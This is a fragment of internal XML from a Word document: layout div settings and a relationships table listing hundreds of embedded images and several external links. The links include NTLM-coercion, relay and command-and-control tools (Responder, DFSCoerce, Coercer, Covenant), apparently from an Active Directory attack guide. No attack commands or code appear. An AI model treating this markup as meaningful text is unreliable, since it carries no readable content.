              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="296226322">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1677994775">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="776098910">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="864250646">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1235046742">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2139301411">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="547692788">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1189100328">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="10425460">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="931401030">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1252153982">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1198271322">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1016620537">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="585575222">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1172455054">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1728526168">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1299845292">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="322512063">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1240139408">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1465657491">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="547180741">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1207765817">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="579170886">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="242758495">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1815609795">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="815268868">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="551112229">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="293144853">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1772312259">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="165831564">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="278296705">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="276378428">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="284846394">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2072266146">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2115247833">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="244728599">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1707632209">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1476334406">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1763334599">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="944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lgandx/Responder" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image265.png"/><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hyperlink" Target="https://github.com/DanMcInerney/Obf-Cats" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image289.png"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image200.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image236.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3.png"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image300.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image210.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image247.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image257.png"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image269.png"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image311.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image220.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80.png"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image322.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image191.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/es-es/dotnet/core/install/linux-scripted-manual" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image238.png"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image291.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theme" Target="theme/theme1.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image202.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image249.png"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30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1.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image211.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image222.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image259.png"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image271.png"/><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13.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cobbr/Covenant" TargetMode="External"/><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282.png"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image324.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.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0.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image293.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Wh04m1001/DFSCoerce" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image194.png"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21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31.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image251.png"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image283.png"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image304.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143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image315.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image205.png"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image224.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image241.png"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image261.png"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image273.png"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image294.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github.com/p0dalirius/Coercer" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image305.png"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image326.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8.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image195.png"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image214.png"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image232.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vmpsoft.com/" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28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8.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image295.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.png"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image316.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5.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image242.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 